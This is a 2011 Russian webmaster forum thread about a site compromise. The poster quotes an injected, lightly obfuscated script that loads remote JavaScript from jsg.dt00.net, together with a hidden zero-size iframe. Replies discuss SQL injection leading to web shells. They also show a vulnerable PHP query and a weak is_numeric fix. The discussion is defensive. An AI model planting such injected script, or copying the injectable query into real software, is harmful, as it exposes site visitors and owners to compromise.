Взломали "умным" iframemом или у меня глюки?

Thorin · 2011-03-22T22:35:56.0000000Z

Как обычно захожу на свой сайт И тут вдруг окошко нода выскакивает что заблокирована угроза с сайта.... я думаю что блин п***ц опять зараза на сайт попала. Захожу в панель вебмастера гугл, сообщений нету открываю на ndex.php исходный код страницы и что и в самом низу я вижу  <script type="text/javascript"> var MarketGidDate = new Date(); document.write('<scr'+'ipt type="text/javascript" '+'src="http://jsg.dt00.net/a/l/****s?t='+MarketGidDate.getYear()+MarketGidDate.getMonth()+'"'+ '" charset="windows-1251" ></scr'+'ipt>'); </script> <nofollow><noindex><iframe src="" width="0" height="0" frameborder="0"></iframe></script></noindex></nofollow>  Интересно почему он с маркетгидом тусит?:) Открываю файл где размещен этот кусок кода (footer.tpl)  <script type="text/javascript"> var MarketGidDate = new Date(); document.write('<scr'+'ipt type="text/javascript" '+'src="http://jsg.dt00.net/a/l/*****.js?t='+MarketGidDate.getYear()+MarketGidDate.getMonth()+'"'+ '" charset="windows-1251" ></scr'+'ipt>'); </script>  А там ничего нету! Сохраняю файл, обновляю страницу и кода уже нету:eek: Проверил лог доступа по фтп, с 30 января файлы сайта не трогались Скачал бекап сайта, проверил нодом, тоже чисто Вопрос, что это было? И как он так появился и исчез?

N

419

netwind

23 марта 2011, 13:05

#11

Thorin:
Разве возможно через эти уязвимости загрузить шел?

Да что угодно возможно. Непродуктивно предполагать и рассуждать о том, что там вообще могло быть, если у тебя нет никаких логов.

Как правило sql-инъекция открывает путь в админку. Если в админке можно изменять файлы, значит можно и шелл залить.

Кнопка вызова админа ()

ModX 1.0.6 -- где Cannot set property '_renderItem' Ищу уродца что бы

162

Mad_Man

23 марта 2011, 15:50

#12

Для справки: дату последнего обновления файла можно изменить, это не критерий для поиска вредоносного кода.

T

81

Thorin

23 марта 2011, 20:20

#13

Проверил файлы с оригиналами, код который дописали не обнаружил, нужно еще раз проверить.

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует при обработке входных данных в параметре "id" сценария "article.php". Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения.

function id_exists($id, $table)

{		

    return $this->query_one_result("SELECT COUNT(*) FROM $table WHERE id = '$id'");

}

для защиты достаточно добавить ????


function id_exists($id, $table)

{

    if(!is_numeric($id))

    die('wrong id');		

    return $this->query_one_result("SELECT COUNT(*) FROM $table WHERE id = '$id'");

}

после того как удалил 2 шела, обнаружил код, прятался он в

var/templates_c файле %%239^%%239105369^footer.tpl.php

Что делать, если ваша email-рассылка попала в спам

В 2023 году Google заблокировал более 170 млн фальшивых отзывов на Картах